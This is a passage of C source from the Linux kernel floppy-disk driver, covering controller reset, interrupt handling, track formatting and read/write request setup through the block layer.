* not to move at recalibration is to
* be already at track 0.) Clear the
* new change flag */
debug_dcl(DP->flags,
"clearing NEWCHANGE flag because of second recalibrate\n");
clear_bit(FD_DISK_NEWCHANGE_BIT, &DRS->flags);
DRS->select_date = jiffies;
/* fall through */
default:
debugt(__func__, "default");
/* Recalibrate moves the head by at
* most 80 steps. If after one
* recalibrate we don't have reached
* track 0, this might mean that we
* started beyond track 80. Try
* again. */
DRS->track = NEED_1_RECAL;
break;
}
} else
DRS->track = ST1;
floppy_ready();
}
static void print_result(char *message, int inr)
{
int i;
DPRINT("%s ", message);
if (inr >= 0)
for (i = 0; i < inr; i++)
pr_cont("repl[%d]=%x ", i, reply_buffer[i]);
pr_cont("\n");
}
/* interrupt handler. Note that this can be called externally on the Sparc */
irqreturn_t floppy_interrupt(int irq, void *dev_id)
{
int do_print;
unsigned long f;
void (*handler)(void) = do_floppy;
lasthandler = handler;
interruptjiffies = jiffies;
f = claim_dma_lock();
fd_disable_dma();
release_dma_lock(f);
do_floppy = NULL;
if (fdc >= N_FDC || FDCS->address == -1) {
/* we don't even know which FDC is the culprit */
pr_info("DOR0=%x\n", fdc_state[0].dor);
pr_info("floppy interrupt on bizarre fdc %d\n", fdc);
pr_info("handler=%ps\n", handler);
is_alive(__func__, "bizarre fdc");
return IRQ_NONE;
}
FDCS->reset = 0;
/* We have to clear the reset flag here, because apparently on boxes
* with level triggered interrupts (PS/2, Sparc, ...), it is needed to
* emit SENSEI's to clear the interrupt line. And FDCS->reset blocks the
* emission of the SENSEI's.
* It is OK to emit floppy commands because we are in an interrupt
* handler here, and thus we have to fear no interference of other
* activity.
*/
do_print = !handler && print_unex && initialized;
inr = result();
if (do_print)
print_result("unexpected interrupt", inr);
if (inr == 0) {
int max_sensei = 4;
do {
output_byte(FD_SENSEI);
inr = result();
if (do_print)
print_result("sensei", inr);
max_sensei--;
} while ((ST0 & 0x83) != UNIT(current_drive) &&
inr == 2 && max_sensei);
}
if (!handler) {
FDCS->reset = 1;
return IRQ_NONE;
}
schedule_bh(handler);
is_alive(__func__, "normal interrupt end");
/* FIXME! Was it really for us? */
return IRQ_HANDLED;
}
static void recalibrate_floppy(void)
{
debugt(__func__, "");
do_floppy = recal_interrupt;
output_byte(FD_RECALIBRATE);
if (output_byte(UNIT(current_drive)) < 0)
reset_fdc();
}
/*
* Must do 4 FD_SENSEIs after reset because of ``drive polling''.
*/
static void reset_interrupt(void)
{
debugt(__func__, "");
result(); /* get the status ready for set_fdc */
if (FDCS->reset) {
pr_info("reset set in interrupt, calling %ps\n", cont->error);
cont->error(); /* a reset just after a reset. BAD! */
}
cont->redo();
}
/*
* reset is done by pulling bit 2 of DOR low for a while (old FDCs),
* or by setting the self clearing bit 7 of STATUS (newer FDCs)
*/
static void reset_fdc(void)
{
unsigned long flags;
do_floppy = reset_interrupt;
FDCS->reset = 0;
reset_fdc_info(0);
/* Pseudo-DMA may intercept 'reset finished' interrupt. */
/* Irrelevant for systems with true DMA (i386). */
flags = claim_dma_lock();
fd_disable_dma();
release_dma_lock(flags);
if (FDCS->version >= FDC_82072A)
fd_outb(0x80 | (FDCS->dtr & 3), FD_STATUS);
else {
fd_outb(FDCS->dor & ~0x04, FD_DOR);
udelay(FD_RESET_DELAY);
fd_outb(FDCS->dor, FD_DOR);
}
}
static void show_floppy(void)
{
int i;
pr_info("\n");
pr_info("floppy driver state\n");
pr_info("-------------------\n");
pr_info("now=%lu last interrupt=%lu diff=%lu last called handler=%ps\n",
jiffies, interruptjiffies, jiffies - interruptjiffies,
lasthandler);
pr_info("timeout_message=%s\n", timeout_message);
pr_info("last output bytes:\n");
for (i = 0; i < OLOGSIZE; i++)
pr_info("%2x %2x %lu\n",
output_log[(i + output_log_pos) % OLOGSIZE].data,
output_log[(i + output_log_pos) % OLOGSIZE].status,
output_log[(i + output_log_pos) % OLOGSIZE].jiffies);
pr_info("last result at %lu\n", resultjiffies);
pr_info("last redo_fd_request at %lu\n", lastredo);
print_hex_dump(KERN_INFO, "", DUMP_PREFIX_NONE, 16, 1,
reply_buffer, resultsize, true);
pr_info("status=%x\n", fd_inb(FD_STATUS));
pr_info("fdc_busy=%lu\n", fdc_busy);
if (do_floppy)
pr_info("do_floppy=%ps\n", do_floppy);
if (work_pending(&floppy_work))
pr_info("floppy_work.func=%ps\n", floppy_work.func);
if (delayed_work_pending(&fd_timer))
pr_info("delayed work.function=%p expires=%ld\n",
fd_timer.work.func,
fd_timer.timer.expires - jiffies);
if (delayed_work_pending(&fd_timeout))
pr_info("timer_function=%p expires=%ld\n",
fd_timeout.work.func,
fd_timeout.timer.expires - jiffies);
pr_info("cont=%p\n", cont);
pr_info("current_req=%p\n", current_req);
pr_info("command_status=%d\n", command_status);
pr_info("\n");
}
static void floppy_shutdown(struct work_struct *arg)
{
unsigned long flags;
if (initialized)
show_floppy();
cancel_activity();
flags = claim_dma_lock();
fd_disable_dma();
release_dma_lock(flags);
/* avoid dma going to a random drive after shutdown */
if (initialized)
DPRINT("floppy timeout called\n");
FDCS->reset = 1;
if (cont) {
cont->done(0);
cont->redo(); /* this will recall reset when needed */
} else {
pr_info("no cont in shutdown!\n");
process_fd_request();
}
is_alive(__func__, "");
}
/* start motor, check media-changed condition and write protection */
static int start_motor(void (*function)(void))
{
int mask;
int data;
mask = 0xfc;
data = UNIT(current_drive);
if (!(raw_cmd->flags & FD_RAW_NO_MOTOR)) {
if (!(FDCS->dor & (0x10 << UNIT(current_drive)))) {
set_debugt();
/* no read since this drive is running */
DRS->first_read_date = 0;
/* note motor start time if motor is not yet running */
DRS->spinup_date = jiffies;
data |= (0x10 << UNIT(current_drive));
}
} else if (FDCS->dor & (0x10 << UNIT(current_drive)))
mask &= ~(0x10 << UNIT(current_drive));
/* starts motor and selects floppy */
del_timer(motor_off_timer + current_drive);
set_dor(fdc, mask, data);
/* wait_for_completion also schedules reset if needed. */
return fd_wait_for_completion(DRS->select_date + DP->select_delay,
function);
}
static void floppy_ready(void)
{
if (FDCS->reset) {
reset_fdc();
return;
}
if (start_motor(floppy_ready))
return;
if (fdc_dtr())
return;
debug_dcl(DP->flags, "calling disk change from floppy_ready\n");
if (!(raw_cmd->flags & FD_RAW_NO_MOTOR) &&
disk_change(current_drive) && !DP->select_delay)
twaddle(); /* this clears the dcl on certain
* drive/controller combinations */
#ifdef fd_chose_dma_mode
if ((raw_cmd->flags & FD_RAW_READ) || (raw_cmd->flags & FD_RAW_WRITE)) {
unsigned long flags = claim_dma_lock();
fd_chose_dma_mode(raw_cmd->kernel_data, raw_cmd->length);
release_dma_lock(flags);
}
#endif
if (raw_cmd->flags & (FD_RAW_NEED_SEEK | FD_RAW_NEED_DISK)) {
perpendicular_mode();
fdc_specify(); /* must be done here because of hut, hlt ... */
seek_floppy();
} else {
if ((raw_cmd->flags & FD_RAW_READ) ||
(raw_cmd->flags & FD_RAW_WRITE))
fdc_specify();
setup_rw_floppy();
}
}
static void floppy_start(void)
{
reschedule_timeout(current_reqD, "floppy start");
scandrives();
debug_dcl(DP->flags, "setting NEWCHANGE in floppy_start\n");
set_bit(FD_DISK_NEWCHANGE_BIT, &DRS->flags);
floppy_ready();
}
/*
* ========================================================================
* here ends the bottom half. Exported routines are:
* floppy_start, floppy_off, floppy_ready, lock_fdc, unlock_fdc, set_fdc,
* start_motor, reset_fdc, reset_fdc_info, interpret_errors.
* Initialization also uses output_byte, result, set_dor, floppy_interrupt
* and set_dor.
* ========================================================================
*/
/*
* General purpose continuations.
* ==============================
*/
static void do_wakeup(void)
{
reschedule_timeout(MAXTIMEOUT, "do wakeup");
cont = NULL;
command_status += 2;
wake_up(&command_done);
}
static const struct cont_t wakeup_cont = {
.interrupt = empty,
.redo = do_wakeup,
.error = empty,
.done = (done_f)empty
};
static const struct cont_t intr_cont = {
.interrupt = empty,
.redo = process_fd_request,
.error = empty,
.done = (done_f)empty
};
static int wait_til_done(void (*handler)(void), bool interruptible)
{
int ret;
schedule_bh(handler);
if (interruptible)
wait_event_interruptible(command_done, command_status >= 2);
else
wait_event(command_done, command_status >= 2);
if (command_status < 2) {
cancel_activity();
cont = &intr_cont;
reset_fdc();
return -EINTR;
}
if (FDCS->reset)
command_status = FD_COMMAND_ERROR;
if (command_status == FD_COMMAND_OKAY)
ret = 0;
else
ret = -EIO;
command_status = FD_COMMAND_NONE;
return ret;
}
static void generic_done(int result)
{
command_status = result;
cont = &wakeup_cont;
}
static void generic_success(void)
{
cont->done(1);
}
static void generic_failure(void)
{
cont->done(0);
}
static void success_and_wakeup(void)
{
generic_success();
cont->redo();
}
/*
* formatting and rw support.
* ==========================
*/
static int next_valid_format(void)
{
int probed_format;
probed_format = DRS->probed_format;
while (1) {
if (probed_format >= 8 || !DP->autodetect[probed_format]) {
DRS->probed_format = 0;
return 1;
}
if (floppy_type[DP->autodetect[probed_format]].sect) {
DRS->probed_format = probed_format;
return 0;
}
probed_format++;
}
}
static void bad_flp_intr(void)
{
int err_count;
if (probing) {
DRS->probed_format++;
if (!next_valid_format())
return;
}
err_count = ++(*errors);
INFBOUND(DRWE->badness, err_count);
if (err_count > DP->max_errors.abort)
cont->done(0);
if (err_count > DP->max_errors.reset)
FDCS->reset = 1;
else if (err_count > DP->max_errors.recal)
DRS->track = NEED_2_RECAL;
}
static void set_floppy(int drive)
{
int type = ITYPE(UDRS->fd_device);
if (type)
_floppy = floppy_type + type;
else
_floppy = current_type[drive];
}
/*
* formatting support.
* ===================
*/
static void format_interrupt(void)
{
switch (interpret_errors()) {
case 1:
cont->error();
case 2:
break;
case 0:
cont->done(1);
}
cont->redo();
}
#define FM_MODE(x, y) ((y) & ~(((x)->rate & 0x80) >> 1))
#define CT(x) ((x) | 0xc0)
static void setup_format_params(int track)
{
int n;
int il;
int count;
int head_shift;
int track_shift;
struct fparm {
unsigned char track, head, sect, size;
} *here = (struct fparm *)floppy_track_buffer;
raw_cmd = &default_raw_cmd;
raw_cmd->track = track;
raw_cmd->flags = (FD_RAW_WRITE | FD_RAW_INTR | FD_RAW_SPIN |
FD_RAW_NEED_DISK | FD_RAW_NEED_SEEK);
raw_cmd->rate = _floppy->rate & 0x43;
raw_cmd->cmd_count = NR_F;
COMMAND = FM_MODE(_floppy, FD_FORMAT);
DR_SELECT = UNIT(current_drive) + PH_HEAD(_floppy, format_req.head);
F_SIZECODE = FD_SIZECODE(_floppy);
F_SECT_PER_TRACK = _floppy->sect << 2 >> F_SIZECODE;
F_GAP = _floppy->fmt_gap;
F_FILL = FD_FILL_BYTE;
raw_cmd->kernel_data = floppy_track_buffer;
raw_cmd->length = 4 * F_SECT_PER_TRACK;
if (!F_SECT_PER_TRACK)
return;
/* allow for about 30ms for data transport per track */
head_shift = (F_SECT_PER_TRACK + 5) / 6;
/* a ``cylinder'' is two tracks plus a little stepping time */
track_shift = 2 * head_shift + 3;
/* position of logical sector 1 on this track */
n = (track_shift * format_req.track + head_shift * format_req.head)
% F_SECT_PER_TRACK;
/* determine interleave */
il = 1;
if (_floppy->fmt_gap < 0x22)
il++;
/* initialize field */
for (count = 0; count < F_SECT_PER_TRACK; ++count) {
here[count].track = format_req.track;
here[count].head = format_req.head;
here[count].sect = 0;
here[count].size = F_SIZECODE;
}
/* place logical sectors */
for (count = 1; count <= F_SECT_PER_TRACK; ++count) {
here[n].sect = count;
n = (n + il) % F_SECT_PER_TRACK;
if (here[n].sect) { /* sector busy, find next free sector */
++n;
if (n >= F_SECT_PER_TRACK) {
n -= F_SECT_PER_TRACK;
while (here[n].sect)
++n;
}
}
}
if (_floppy->stretch & FD_SECTBASEMASK) {
for (count = 0; count < F_SECT_PER_TRACK; count++)
here[count].sect += FD_SECTBASE(_floppy) - 1;
}
}
static void redo_format(void)
{
buffer_track = -1;
setup_format_params(format_req.track << STRETCH(_floppy));
floppy_start();
debugt(__func__, "queue format request");
}
static const struct cont_t format_cont = {
.interrupt = format_interrupt,
.redo = redo_format,
.error = bad_flp_intr,
.done = generic_done
};
static int do_format(int drive, struct format_descr *tmp_format_req)
{
int ret;
if (lock_fdc(drive))
return -EINTR;
set_floppy(drive);
if (!_floppy ||
_floppy->track > DP->tracks ||
tmp_format_req->track >= _floppy->track ||
tmp_format_req->head >= _floppy->head ||
(_floppy->sect << 2) % (1 << FD_SIZECODE(_floppy)) ||
!_floppy->fmt_gap) {
process_fd_request();
return -EINVAL;
}
format_req = *tmp_format_req;
format_errors = 0;
cont = &format_cont;
errors = &format_errors;
ret = wait_til_done(redo_format, true);
if (ret == -EINTR)
return -EINTR;
process_fd_request();
return ret;
}
/*
* Buffer read/write and support
* =============================
*/
static void floppy_end_request(struct request *req, blk_status_t error)
{
unsigned int nr_sectors = current_count_sectors;
unsigned int drive = (unsigned long)req->rq_disk->private_data;
/* current_count_sectors can be zero if transfer failed */
if (error)
nr_sectors = blk_rq_cur_sectors(req);
if (blk_update_request(req, error, nr_sectors << 9))
return;
__blk_mq_end_request(req, error);
/* We're done with the request */
floppy_off(drive);
current_req = NULL;
}
/* new request_done. Can handle physical sectors which are smaller than a
* logical buffer */
static void request_done(int uptodate)
{
struct request *req = current_req;
int block;
char msg[sizeof("request done ") + sizeof(int) * 3];
probing = 0;
snprintf(msg, sizeof(msg), "request done %d", uptodate);
reschedule_timeout(MAXTIMEOUT, msg);
if (!req) {
pr_info("floppy.c: no request in request_done\n");
return;
}
if (uptodate) {
/* maintain values for invalidation on geometry
* change */
block = current_count_sectors + blk_rq_pos(req);
INFBOUND(DRS->maxblock, block);
if (block > _floppy->sect)
DRS->maxtrack = 1;
floppy_end_request(req, 0);
} else {
if (rq_data_dir(req) == WRITE) {
/* record write error information */
DRWE->write_errors++;
if (DRWE->write_errors == 1) {
DRWE->first_error_sector = blk_rq_pos(req);
DRWE->first_error_generation = DRS->generation;
}
DRWE->last_error_sector = blk_rq_pos(req);
DRWE->last_error_generation = DRS->generation;
}
floppy_end_request(req, BLK_STS_IOERR);
}
}
/* Interrupt handler evaluating the result of the r/w operation */
static void rw_interrupt(void)
{
int eoc;
int ssize;
int heads;
int nr_sectors;
if (R_HEAD >= 2) {
/* some Toshiba floppy controllers occasionnally seem to
* return bogus interrupts after read/write operations, which
* can be recognized by a bad head number (>= 2) */
return;
}
if (!DRS->first_read_date)
DRS->first_read_date = jiffies;
nr_sectors = 0;
ssize = DIV_ROUND_UP(1 << SIZECODE, 4);
if (ST1 & ST1_EOC)
eoc = 1;
else
eoc = 0;
if (COMMAND & 0x80)
heads = 2;
else
heads = 1;
nr_sectors = (((R_TRACK - TRACK) * heads +
R_HEAD - HEAD) * SECT_PER_TRACK +
R_SECTOR - SECTOR + eoc) << SIZECODE >> 2;
if (nr_sectors / ssize >
DIV_ROUND_UP(in_sector_offset + current_count_sectors, ssize)) {
DPRINT("long rw: %x instead of %lx\n",
nr_sectors, current_count_sectors);
pr_info("rs=%d s=%d\n", R_SECTOR, SECTOR);
pr_info("rh=%d h=%d\n", R_HEAD, HEAD);
pr_info("rt=%d t=%d\n", R_TRACK, TRACK);
pr_info("heads=%d eoc=%d\n", heads, eoc);
pr_info("spt=%d st=%d ss=%d\n",
SECT_PER_TRACK, fsector_t, ssize);
pr_info("in_sector_offset=%d\n", in_sector_offset);
}
nr_sectors -= in_sector_offset;
INFBOUND(nr_sectors, 0);
SUPBOUND(current_count_sectors, nr_sectors);
switch (interpret_errors()) {
case 2:
cont->redo();
return;
case 1:
if (!current_count_sectors) {
cont->error();
cont->redo();
return;
}
break;
case 0:
if (!current_count_sectors) {
cont->redo();
return;
}
current_type[current_drive] = _floppy;
floppy_sizes[TOMINOR(current_drive)] = _floppy->size;
break;
}
if (probing) {
if (DP->flags & FTD_MSG)
DPRINT("Auto-detected floppy type %s in fd%d\n",
_floppy->name, current_drive);
current_type[current_drive] = _floppy;
floppy_sizes[TOMINOR(current_drive)] = _floppy->size;
probing = 0;
}
if (CT(COMMAND) != FD_READ ||
raw_cmd->kernel_data == bio_data(current_req->bio)) {
/* transfer directly from buffer */
cont->done(1);
} else if (CT(COMMAND) == FD_READ) {
buffer_track = raw_cmd->track;
buffer_drive = current_drive;
INFBOUND(buffer_max, nr_sectors + fsector_t);
}
cont->redo();
}
/* Compute maximal contiguous buffer size. */
static int buffer_chain_size(void)
{
struct bio_vec bv;
int size;
struct req_iterator iter;
char *base;
base = bio_data(current_req->bio);
size = 0;
rq_for_each_segment(bv, current_req, iter) {
if (page_address(bv.bv_page) + bv.bv_offset != base + size)
break;
size += bv.bv_len;
}
return size >> 9;
}
/* Compute the maximal transfer size */
static int transfer_size(int ssize, int max_sector, int max_size)
{
SUPBOUND(max_sector, fsector_t + max_size);
/* alignment */
max_sector -= (max_sector % _floppy->sect) % ssize;
/* transfer size, beginning not aligned */
current_count_sectors = max_sector - fsector_t;
return max_sector;
}
/*
* Move data from/to the track buffer to/from the buffer cache.
*/
static void copy_buffer(int ssize, int max_sector, int max_sector_2)
{
int remaining; /* number of transferred 512-byte sectors */
struct bio_vec bv;
char *buffer;
char *dma_buffer;
int size;
struct req_iterator iter;
max_sector = transfer_size(ssize,
min(max_sector, max_sector_2),
blk_rq_sectors(current_req));
if (current_count_sectors <= 0 && CT(COMMAND) == FD_WRITE &&
buffer_max > fsector_t + blk_rq_sectors(current_req))
current_count_sectors = min_t(int, buffer_max - fsector_t,
blk_rq_sectors(current_req));
remaining = current_count_sectors << 9;
if (remaining > blk_rq_bytes(current_req) && CT(COMMAND) == FD_WRITE) {
DPRINT("in copy buffer\n");
pr_info("current_count_sectors=%ld\n", current_count_sectors);
pr_info("remaining=%d\n", remaining >> 9);
pr_info("current_req->nr_sectors=%u\n",
blk_rq_sectors(current_req));
pr_info("current_req->current_nr_sectors=%u\n",
blk_rq_cur_sectors(current_req));
pr_info("max_sector=%d\n", max_sector);
pr_info("ssize=%d\n", ssize);
}
buffer_max = max(max_sector, buffer_max);
dma_buffer = floppy_track_buffer + ((fsector_t - buffer_min) << 9);
size = blk_rq_cur_bytes(current_req);
rq_for_each_segment(bv, current_req, iter) {
if (!remaining)
break;
size = bv.bv_len;
SUPBOUND(size, remaining);
buffer = page_address(bv.bv_page) + bv.bv_offset;
if (dma_buffer + size >
floppy_track_buffer + (max_buffer_sectors << 10) ||
dma_buffer < floppy_track_buffer) {
DPRINT("buffer overrun in copy buffer %d\n",
(int)((floppy_track_buffer - dma_buffer) >> 9));
pr_info("fsector_t=%d buffer_min=%d\n",
fsector_t, buffer_min);
pr_info("current_count_sectors=%ld\n",
current_count_sectors);
if (CT(COMMAND) == FD_READ)
pr_info("read\n");
if (CT(COMMAND) == FD_WRITE)
pr_info("write\n");
break;
}
if (((unsigned long)buffer) % 512)
DPRINT("%p buffer not aligned\n", buffer);
if (CT(COMMAND) == FD_READ)
memcpy(buffer, dma_buffer, size);
else
memcpy(dma_buffer, buffer, size);
remaining -= size;
dma_buffer += size;
}
if (remaining) {
if (remaining > 0)
max_sector -= remaining >> 9;
DPRINT("weirdness: remaining %d\n", remaining >> 9);
}
}
/* work around a bug in pseudo DMA
* (on some FDCs) pseudo DMA does not stop when the CPU stops
* sending data. Hence we need a different way to signal the
* transfer length: We use SECT_PER_TRACK. Unfortunately, this
* does not work with MT, hence we can only transfer one head at
* a time
*/
static void virtualdmabug_workaround(void)
{
int hard_sectors;
int end_sector;
if (CT(COMMAND) == FD_WRITE) {
COMMAND &= ~0x80; /* switch off multiple track mode */
hard_sectors = raw_cmd->length >> (7 + SIZECODE);
end_sector = SECTOR + hard_sectors - 1;
if (end_sector > SECT_PER_TRACK) {
pr_info("too many sectors %d > %d\n",
end_sector, SECT_PER_TRACK);
return;
}
SECT_PER_TRACK = end_sector;
/* make sure SECT_PER_TRACK
* points to end of transfer */
}
}
/*
* Formulate a read/write request.
* this routine decides where to load the data (directly to buffer, or to
* tmp floppy area), how much data to load (the size of the buffer, the whole
* track, or a single sector)
* All floppy_track_buffer handling goes in here. If we ever add track buffer
* allocation on the fly, it should be done here. No other part should need
* modification.
*/
static int make_raw_rw_request(void)
{
int aligned_sector_t;
int max_sector;
int max_size;
int tracksize;
int ssize;
if (WARN(max_buffer_sectors == 0, "VFS: Block I/O scheduled on unopened device\n"))
return 0;
set_fdc((long)current_req->rq_disk->private_data);
raw_cmd = &default_raw_cmd;
raw_cmd->flags = FD_RAW_SPIN | FD_RAW_NEED_DISK | FD_RAW_NEED_SEEK;
raw_cmd->cmd_count = NR_RW;
if (rq_data_dir(current_req) == READ) {
raw_cmd->flags |= FD_RAW_READ;
COMMAND = FM_MODE(_floppy, FD_READ);
} else if (rq_data_dir(current_req) == WRITE) {
raw_cmd->flags |= FD_RAW_WRITE;
COMMAND = FM_MODE(_floppy, FD_WRITE);
} else {
DPRINT("%s: unknown command\n", __func__);
return 0;
}
max_sector = _floppy->sect * _floppy->head;
TRACK = (int)blk_rq_pos(current_req) / max_sector;
fsector_t = (int)blk_rq_pos(current_req) % max_sector;
if (_floppy->track && TRACK >= _floppy->track) {
if (blk_rq_cur_sectors(current_req) & 1) {
current_count_sectors = 1;
return 1;
} else
return 0;
}
HEAD = fsector_t / _floppy->sect;
if (((_floppy->stretch & (FD_SWAPSIDES | FD_SECTBASEMASK)) ||
test_bit(FD_NEED_TWADDLE_BIT, &DRS->flags)) &&
fsector_t < _floppy->sect)
max_sector = _floppy->sect;
/* 2M disks have phantom sectors on the first track */
if ((_floppy->rate & FD_2M) && (!TRACK) && (!HEAD)) {
max_sector = 2 * _floppy->sect / 3;
if (fsector_t >= max_sector) {
current_count_sectors =
min_t(int, _floppy->sect - fsector_t,
blk_rq_sectors(current_req));
return 1;
}
SIZECODE = 2;
} else
SIZECODE = FD_SIZECODE(_floppy);
raw_cmd->rate = _floppy->rate & 0x43;
if ((_floppy->rate & FD_2M) && (TRACK || HEAD) && raw_cmd->rate == 2)
raw_cmd->rate = 1;
if (SIZECODE)
SIZECODE2 = 0xff;
else
SIZECODE2 = 0x80;
raw_cmd->track = TRACK << STRETCH(_floppy);
DR_SELECT = UNIT(current_drive) + PH_HEAD(_floppy, HEAD);
GAP = _floppy->gap;
ssize = DIV_ROUND_UP(1 << SIZECODE, 4);
SECT_PER_TRACK = _floppy->sect << 2 >> SIZECODE;
SECTOR = ((fsector_t % _floppy->sect) << 2 >> SIZECODE) +
FD_SECTBASE(_floppy);
/* tracksize describes the size which can be filled up with sectors
* of size ssize.
*/
tracksize = _floppy->sect - _floppy->sect % ssize;
if (tracksize < _floppy->sect) {
SECT_PER_TRACK++;
if (tracksize <= fsector_t % _floppy->sect)
SECTOR--;
/* if we are beyond tracksize, fill up using smaller sectors */
while (tracksize <= fsector_t % _floppy->sect) {
while (tracksize + ssize > _floppy->sect) {
SIZECODE--;
ssize >>= 1;
}
SECTOR++;
SECT_PER_TRACK++;
tracksize += ssize;
}
max_sector = HEAD * _floppy->sect + tracksize;
} else if (!TRACK && !HEAD && !(_floppy->rate & FD_2M) && probing) {
max_sector = _floppy->sect;
} else if (!HEAD && CT(COMMAND) == FD_WRITE) {
/* for virtual DMA bug workaround */
max_sector = _floppy->sect;
}
in_sector_offset = (fsector_t % _floppy->sect) % ssize;
aligned_sector_t = fsector_t - in_sector_offset;
max_size = blk_rq_sectors(current_req);
if ((raw_cmd->track == buffer_track) &&
(current_drive == buffer_drive) &&
(fsector_t >= buffer_min) && (fsector_t < buffer_max)) {
/* data already in track buffer */
if (CT(COMMAND) == FD_READ) {
copy_buffer(1, max_sector, buffer_max);
return 1;
}
} else if (in_sector_offset || blk_rq_sectors(current_req) < ssize) {
if (CT(COMMAND) == FD_WRITE) {
unsigned int sectors;
sectors = fsector_t + blk_rq_sectors(current_req);
if (sectors > ssize && sectors < ssize + ssize)
max_size = ssize + ssize;
else
max_size = ssize;
}
raw_cmd->flags &= ~FD_RAW_WRITE;
raw_cmd->flags |= FD_RAW_READ;
COMMAND = FM_MODE(_floppy, FD_READ);
} else if ((unsigned long)bio_data(current_req->bio) < MAX_DMA_ADDRESS) {
unsigned long dma_limit;
int direct, indirect;
indirect =
transfer_size(ssize, max_sector,
max_buffer_sectors * 2) - fsector_t;
/*
* Do NOT use minimum() here---MAX_DMA_ADDRESS is 64 bits wide
* on a 64 bit machine!
*/
max_size = buffer_chain_size();
dma_limit = (MAX_DMA_ADDRESS -
((unsigned long)bio_data(current_req->bio))) >> 9;
if ((unsigned long)max_size > dma_limit)
max_size = dma_limit;
/* 64 kb boundaries */
if (CROSS_64KB(bio_data(current_req->bio), max_size << 9))
max_size = (K_64 -
((unsigned long)bio_data(current_req->bio)) %
K_64) >> 9;
direct = transfer_size(ssize, max_sector, max_size) - fsector_t;
/*
* We try to read tracks, but if we get too many errors, we
* go back to reading just one sector at a time.
*
* This means we should be able to read a sector even if there
* are other bad sectors on this track.
*/
if (!direct ||
(indirect * 2 > direct * 3 &&
*errors < DP->max_errors.read_track &&
((!probing ||
(DP->read_track & (1 << DRS->probed_format)))))) {
max_size = blk_rq_sectors(current_req);
} else {
raw_cmd->kernel_data = bio_data(current_req->bio);
raw_cmd->length = current_count_sectors << 9;
if (raw_cmd->length == 0) {
DPRINT("%s: zero dma transfer attempted\n", __func__);
DPRINT("indirect=%d direct=%d fsector_t=%d\n",
indirect, direct, fsector_t);
return 0;
}
virtualdmabug_workaround();
return 2;
}
}
if (CT(COMMAND) == FD_READ)
max_size = max_sector; /* unbounded */
/* claim buffer track if needed */
if (buffer_track != raw_cmd->track || /* bad track */
buffer_drive != current_drive || /* bad drive */
fsector_t > buffer_max ||
fsector_t < buffer_min ||
((CT(COMMAND) == FD_READ ||
(!in_sector_offset && blk_rq_sectors(current_req) >= ssize)) &&
max_sector > 2 * max_buffer_sectors + buffer_min &&
max_size + fsector_t > 2 * max_buffer_sectors + buffer_min)) {
/* not enough space */
buffer_track = -1;
buffer_drive = current_drive;
buffer_max = buffer_min = aligned_sector_t;
}
raw_cmd->kernel_data = floppy_track_buffer +
((aligned_sector_t - buffer_min) << 9);
if (CT(COMMAND) == FD_WRITE) {
/* copy write buffer to track buffer.
* if we get here, we know that the write
* is either aligned or the data already in the buffer
* (buffer will be overwritten) */
if (in_sector_offset && buffer_track == -1)
DPRINT("internal error offset !=0 on write\n");
buffer_track = raw_cmd->track;
buffer_drive = current_drive;
copy_buffer(ssize, max_sector,
2 * max_buffer_sectors + buffer_min);
} else
transfer_size(ssize, max_sector,
2 * max_buffer_sectors + buffer_min -
aligned_sector_t);
/* round up current_count_sectors to get dma xfer size */
raw_cmd->length = in_sector_offset + current_count_sectors;
raw_cmd->length = ((raw_cmd->length - 1) | (ssize - 1)) + 1;
raw_cmd->length <<= 9;
if ((raw_cmd->length < current_count_sectors << 9) ||
(raw_cmd->kernel_data != bio_data(current_req->bio) &&
CT(COMMAND) == FD_WRITE &&
(aligned_sector_t + (raw_cmd->length >> 9) > buffer_max ||
aligned_sector_t < buffer_min)) ||
raw_cmd->length % (128 << SIZECODE) ||
raw_cmd->length <= 0 || current_count_sectors <= 0) {
DPRINT("fractionary current count b=%lx s=%lx\n",
raw_cmd->length, current_count_sectors);
if (raw_cmd->kernel_data != bio_data(current_req->bio))
pr_info("addr=%d, length=%ld\n",
(int)((raw_cmd->kernel_data -
floppy_track_buffer) >> 9),
current_count_sectors);
pr_info("st=%d ast=%d mse=%d msi=%d\n",
fsector_t, aligned_sector_t, max_sector, max_size);
pr_info("ssize=%x SIZECODE=%d\n", ssize, SIZECODE);
pr_info("command=%x SECTOR=%d HEAD=%d, TRACK=%d\n",
COMMAND, SECTOR, HEAD, TRACK);
pr_info("buffer drive=%d\n", buffer_drive);
pr_info("buffer track=%d\n", buffer_track);
pr_info("buffer_min=%d\n", buffer_min);
pr_info("buffer_max=%d\n", buffer_max);
return 0;
}
if (raw_cmd->kernel_data != bio_data(current_req->bio)) {
if (raw_cmd->kernel_data < floppy_track_buffer ||
current_count_sectors < 0 ||
raw_cmd->length < 0 ||
raw_cmd->kernel_data + raw_cmd->length >
floppy_track_buffer + (max_buffer_sectors << 10)) {
DPRINT("buffer overrun in schedule dma\n");
pr_info("fsector_t=%d buffer_min=%d current_count=%ld\n",
fsector_t, buffer_min, raw_cmd->length >> 9);
pr_info("current_count_sectors=%ld\n",
current_count_sectors);
if (CT(COMMAND) == FD_READ)
pr_info("read\n");
if (CT(COMMAND) == FD_WRITE)
pr_info("write\n");
return 0;
}
} else if (raw_cmd->length > blk_rq_bytes(current_req) ||
current_count_sectors > blk_rq_sectors(current_req)) {
DPRINT("buffer overrun in direct transfer\n");
return 0;
} else if (raw_cmd->length < current_count_sectors << 9) {
DPRINT("more sectors than bytes\n");
pr_info("bytes=%ld\n", raw_cmd->length >> 9);
pr_info("sectors=%ld\n", current_count_sectors);
}
if (raw_cmd->length == 0) {
DPRINT("zero dma transfer attempted from make_raw_request\n");
return 0;
}
virtualdmabug_workaround();
return 2;
}
static int set_next_request(void)
{
current_req = list_first_entry_or_null(&floppy_reqs, struct request,
queuelist);
if (current_req) {
current_req->error_count = 0;
list_del_init(¤t_req->queuelist);
}
return current_req != NULL;
}
static void redo_fd_request(void)
{
int drive;
int tmp;
lastredo = jiffies;
if (current_drive < N_DRIVE)
floppy_off(current_drive);
do_request:
if (!current_req) {
int pending;
spin_lock_irq(&floppy_lock);
pending = set_next_request();
spin_unlock_irq(&floppy_lock);
if (!pending) {
do_floppy = NULL;
unlock_fdc();
return;
}
}
drive = (long)current_req->rq_disk->private_data;
set_fdc(drive);
reschedule_timeout(current_reqD, "redo fd request");
set_floppy(drive);
raw_cmd = &default_raw_cmd;
raw_cmd->flags = 0;
if (start_motor(redo_fd_request))
return;
disk_change(current_drive);
if (test_bit(current_drive, &fake_change) ||
test_bit(FD_DISK_CHANGED_BIT, &DRS->flags)) {
DPRINT("disk absent or changed during operation\n");
request_done(0);
goto do_request;
}
